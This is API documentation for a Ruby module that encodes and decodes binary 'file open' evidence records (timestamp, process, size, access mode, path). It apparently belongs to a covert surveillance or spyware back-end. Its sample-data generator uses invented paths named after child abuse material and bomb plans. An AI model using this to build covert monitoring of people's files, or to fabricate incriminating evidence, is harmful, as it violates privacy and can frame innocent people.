Module: RCS::FileopenEvidence

Defined in:
lib/rcs-common/evidence/file.rb

Constant Summary collapse

ELEM_DELIMITER = 
0xABADC0DE

Instance Method Summary collapse

Instance Method Details

#content(*args) ⇒ Object 



11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
 
# File 'lib/rcs-common/evidence/file.rb', line 11

def content(*args)
  hash = [args].flatten.first || {}

  process = hash[:process] || ["Explorer.exe\0", "Firefox.exe\0", "Chrome.exe\0"].sample
  process.encode!("US-ASCII")

  path = hash[:path] || ["C:\\Utenti\\pippo\\pedoporno.mpg", "C:\\Utenti\\pluto\\Documenti\\childporn.avi", "C:\\secrets\\bomb_blueprints.pdf"].sample
  path = path.to_utf16le_binary_null

  content = StringIO.new
  t = Time.now.getutc
  content.write [t.sec, t.min, t.hour, t.mday, t.mon, t.year, t.wday, t.yday, t.isdst ? 0 : 1].pack('l*')
  content.write process
  content.write [ 0 ].pack('L') # size hi
  content.write [ hash[:size] || 123456789 ].pack('L') # size lo
  content.write [ 0x80000000 ].pack('l') # access mode
  content.write path
  content.write [ ELEM_DELIMITER ].pack('L')
  content.string
end

#decode_content(common_info, chunks) ⇒ Object 



36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
 
# File 'lib/rcs-common/evidence/file.rb', line 36

def decode_content(common_info, chunks)
  stream = StringIO.new chunks.join

  until stream.eof?
    info = Hash[common_info]
    info[:data] = Hash.new
    info[:data][:type] = :open

    tm = stream.read 36
    info[:da] = Time.gm(*tm.unpack('l*'), 0)
    info[:data][:program] = ''
    info[:data][:path] = ''

    process_name = stream.read_ascii_string
    info[:data][:program] = process_name.force_encoding('US-ASCII') unless process_name.nil?

    size_hi = stream.read(4).unpack("L").first
    size_lo = stream.read(4).unpack("L").first
    info[:data][:size] = size_hi << 32 | size_lo
    info[:data][:access] = stream.read(4).unpack("l").first

    file = stream.read_utf16le_string
    info[:data][:path] = file.utf16le_to_utf8 unless file.nil?
    
    delim = stream.read(4).unpack("L*").first
    raise EvidenceDeserializeError.new("Malformed FILEOPEN (missing delimiter)") unless delim == ELEM_DELIMITER

    yield info if block_given?
  end
  :delete_raw
end

#generate_content(*args) ⇒ Object 



32
33
34
 
# File 'lib/rcs-common/evidence/file.rb', line 32

def generate_content(*args)
  [content(*args)]
end